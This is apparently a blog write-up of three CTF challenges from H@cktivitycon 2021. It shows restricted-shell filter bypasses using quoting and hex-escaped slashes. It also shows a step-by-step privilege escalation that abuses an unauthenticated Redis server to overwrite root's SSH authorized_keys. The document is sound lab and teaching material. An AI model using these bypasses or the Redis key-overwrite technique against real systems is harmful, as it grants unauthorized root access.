In mid September 2021, I participated in the H@cktivitycon 2021 CTF. The event was hosted by HackerOne and lasted for two days.
I signed up earlier but only played the main challenges in the last few hours, which I now regret because there were so many fantastic challenges 😅🔨
So now in this post I’ll share my writeup/ssolutions for three miscellaneous category challenges that I solved.
Badwords
Walkthrough
When connecting, I can assume that it’s not in a proper TTY, maybe a kind of wrapper shell. Each command I sent returned with the same message telling me that it was a bad word.
iamf@ubuntu:~$ rlwrap nc -v challenge.ctf.games 32559
Connection to challenge.ctf.games 32559 port [tcp/*] succeeded!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
user@host:/home/user$ ls -l
ls -l
You said a bad word, "l"!!
user@host:/home/user$ echo $0
echo $0
You said a bad word, "echo"!!
But if I send a command separator, it returns a syntax error (notice the ;'
)
user@host:/home/user$ ;ls
;ls
bash: syntax error near unexpected token `;'
user@host:/home/user$
If I send a command enclosed with a single quote, I get the expected results. And if I supply an argument, it returns a different error.
user@host:/home/user$ 'whoami'
'whoami'
user
user@host:/home/user$ 'ls -l'
'ls -l'
bash: ls -l: command not found
So I try to separate the argument, and it works.
user@host:/home/user$ 'ls' '-l'
'ls' '-l'
total 4
drwxr-xr-x 1 user user 4096 Sep 9 19:47 just
Now I can just do a recursive ls
to find the flag and read it.
user@host:/home/user$ 'ls' '-l' '-R' 'just'
'ls' '-l' '-R' 'just'
just:
total 4
drwxr-xr-x 1 user user 4096 Sep 9 19:47 out
just/out:
total 4
drwxr-xr-x 1 user user 4096 Sep 9 19:47 of
just/out/of:
total 4
drwxr-xr-x 1 user user 4096 Sep 9 19:47 reach
just/out/of/reach:
total 4
-rw-r--r-- 1 user user 38 Sep 9 19:47 flag.txt
user@host:/home/user$ 'cat' 'just/out/of/reach/flag.txt'
'cat' 'just/out/of/reach/flag.txt'
flag{2d43e30a358d3f30fe65cc47a9cbbe98}user@host:/home/user$
Shelle
Walkthrough
This challenge is another shell wrapper like badwords. Upon connected, I was provided with the following menu.
iamf@ubuntu:~$ rlwrap nc challenge.ctf.games 32217
Welcome to Shelle, a custom psuedo shell utility created by Professor Shelle in order to teach students about Linux terminals
Shelle is a restricted environment to prevent any misuse, Please Enter 'HELP' to know about available features, happy learning !
root@pshelle$ HELP
HELP
Here is the list of command availiable to Students
1> whoami
2> pwd
3> ls
4> ps
5> id
6> echo
7> cat
root@shelle$
When I use the ls
command, I didn’t find any flag in the current working directory. It seems I have to find it somewhere in this machine.
root@shelle$ ls
ls
assignment.txt bin
The first thing I tried was to list the root directory with ls -l /
, but it turned out that some characters, including /
, are flagged as illegal. Luckily, these chars are not,
$ ( ) " \
So, I can use the echo
command with -e
option within a subshell to print \x2f
which is a hex form of /
.
root@shelle$ ls $(echo -e "\x2f")
ls $(echo -e "\x2f")
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
After wandering around, I found the flag on /opt/
.
root@shelle$ ls $(echo -e "\x2fopt") -lt
ls $(echo -e "\x2fopt") -lt
total 24
-rwxr-xr-x 1 shelle shelle 17312 Sep 9 19:33 binary
-r--r--r-- 1 root root 38 Sep 9 19:33 flag.txt
root@shelle$ cat $(echo -e "\x2fopt\x2fflag.txt")
cat $(echo -e "\x2fopt\x2fflag.txt")
flag{82ad133488ad326eaf2120e03253e5d7}
Note: I added a space after the shell prompt for readability and syntax highlighting.
Redlike
Walkthrough
For this challenge, there was a set of credentials given for SSH login into a VM instance.
iamf@ubuntu:~$ ssh -p 31464 user@challenge.ctf.games
user@challenge.ctf.games's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.120+ x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
user@redlike-a6548218fe17631b-b75878d5-qsl75:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
At the root directory, I found .docker-entrypoint
.
user@redlike-a6548218fe17631b-b75878d5-qsl75:/$ ls -lah
total 72K
drwxr-xr-x 1 root root 4.0K Sep 18 11:34 .
drwxr-xr-x 1 root root 4.0K Sep 18 11:34 ..
-rwxr-xr-x 1 root root 61 Sep 16 14:43 .docker-entrypoint
lrwxrwxrwx 1 root root 7 Aug 27 07:16 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Apr 15 2020 boot
drwxr-xr-x 5 root root 360 Sep 18 11:34 dev
drwxr-xr-x 1 root root 4.0K Sep 16 14:44 etc
drwxr-xr-x 1 root root 4.0K Sep 16 14:43 home
lrwxrwxrwx 1 root root 7 Aug 27 07:16 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Aug 27 07:16 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Aug 27 07:16 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Aug 27 07:16 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4.0K Aug 27 07:16 media
drwxr-xr-x 2 root root 4.0K Aug 27 07:16 mnt
drwxr-xr-x 2 root root 4.0K Aug 27 07:16 opt
dr-xr-xr-x 2595 root root 0 Sep 18 11:34 proc
drwx------ 1 root root 4.0K Sep 16 14:44 root
drwxr-xr-x 1 root root 4.0K Sep 18 11:34 run
lrwxrwxrwx 1 root root 8 Aug 27 07:16 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Aug 27 07:16 srv
dr-xr-xr-x 12 root root 0 Sep 18 11:33 sys
drwxrwxrwt 1 root root 4.0K Sep 16 14:44 tmp
drwxr-xr-x 1 root root 4.0K Aug 27 07:16 usr
drwxr-xr-x 1 root root 4.0K Aug 27 07:27 var
Based on the contents of the file and the name of the challenge, it’s clear that the privesc has something to do with Redis.
user@redlike-a6548218fe17631b-b75878d5-qsl75:/$ cat .docker-entrypoint
#!/bin/bash
/etc/init.d/redis-server start
/usr/sbin/sshd -D
I can connect to the Redis server using redis-cli
without authentication. I started the enumeration by sending INFO
command, but under # Keyspace
, I found no active database.
user@redlike-a6548218fe17631b-b75878d5-qsl75:/$ which redis-cli
/usr/bin/redis-cli
user@redlike-a6548218fe17631b-b75878d5-qsl75:/$ redis-cli
127.0.0.1:6379> INFO
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:636cde3b5c7a3923
redis_mode:standalone
os:Linux 5.4.120+ x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.2.1
process_id:15
run_id:f5d6504f95159db85bb78e1bd786b2f3171564fd
tcp_port:6379
uptime_in_seconds:344
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:4575234
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0
# Memory
used_memory:859152
used_memory_human:839.02K
used_memory_rss:6017024
used_memory_rss_human:5.74M
used_memory_peak:859152
used_memory_peak_human:839.02K
used_memory_peak_perc:100.12%
used_memory_overhead:845926
used_memory_startup:796232
used_memory_dataset:13226
used_memory_dataset_perc:21.02%
allocator_allocated:1575864
allocator_active:1847296
allocator_resident:9879552
total_system_memory:33678073856
total_system_memory_human:31.37G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.17
allocator_frag_bytes:271432
allocator_rss_ratio:5.35
allocator_rss_bytes:8032256
rss_overhead_ratio:0.61
rss_overhead_bytes:-3862528
mem_fragmentation_ratio:7.36
mem_fragmentation_bytes:5199880
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1631964842
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
# Stats
total_connections_received:1
total_commands_processed:1
instantaneous_ops_per_sec:0
total_net_input_bytes:31
total_net_output_bytes:11468
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
connected_slaves:0
master_replid:f4b741e04432090f4eba3ef1fbdb2ce11e405aeb
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.271186
used_cpu_user:0.278797
used_cpu_sys_children:0.000000
used_cpu_user_children:0.000000
# Cluster
cluster_enabled:0
# Keyspace
127.0.0.1:6379>
The next thing I tried was writing a file to /tmp
.
127.0.0.1:6379> config set dir /tmp
OK
127.0.0.1:6379> config set dbfilename choropys.php
OK
127.0.0.1:6379> set test "choropys"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
I exited from redis-cli
and immediately checked the file I wrote under /tmp
. It’s there and the owner is root!
user@redlike-a6548218fe17631b-b75878d5-qsl75:/$ ls -l /tmp/choropys.php
-rw-rw---- 1 root root 112 Sep 18 11:45 /tmp/choropys.php
This arbitrary file write lack the execute permissions, but I remember from Hack The Box Postman that it is possible to use this to overwite the SSH authorized_keys
file (see this writeup by 0xdf). So I can try to ovewrite the root’s authorized_keys
file.
First, I need to generate a pair of SSH keys.
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ mkdir .ssh
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/user/.ssh/id_rsa
Your public key has been saved in /home/user/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:AVk3h1vdyP/x1KCcBr/IQY7eac9vzZUUrMx/pNkB0KI user@redlike-20edff3e85f553f2-55b895664b-szch7
The key's randomart image is:
+---[RSA 3072]----+
| .o. oo+o.o |
| .. .++.o=o.|
| .+.*+oooo|
| .E+ *+ +=|
| .So = .o**|
| . * . oo*|
| . o oo|
| o . o|
| o. |
+----[SHA256]-----+
Then I will have to wrap the SSH public key with two extra newlines.
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
Now the key can be stored in Redis using the following command.
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ cat spaced_key.txt | redis-cli -x set spaced_key.txt
OK
Then I can just set the database file name to authorized_keys
and save that under /root/.ssh/
.
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ redis-cli
127.0.0.1:6379> config set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
And it worked, I can SSH login as root user.
user@redlike-20edff3e85f553f2-55b895664b-szch7:~$ ssh root@redlike-20edff3e85f553f2-55b895664b-szch7
The authenticity of host 'redlike-20edff3e85f553f2-55b895664b-szch7 (10.112.8.36)' can't be established.
ECDSA key fingerprint is SHA256:m9vzgGyWcCXB1tg0uLHYCKCaDNZFUnbeSirAvvLkYxU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'redlike-20edff3e85f553f2-55b895664b-szch7,10.112.8.36' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.120+ x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@redlike-20edff3e85f553f2-55b895664b-szch7:~# id
uid=0(root) gid=0(root) groups=0(root)
root@redlike-20edff3e85f553f2-55b895664b-szch7:~# ls -l
total 4
--w------- 1 root root 39 Sep 16 14:43 flag.txt
root@redlike-20edff3e85f553f2-55b895664b-szch7:~# cat flag.txt
flag{69dc14707af23b728ebd1363715ec890}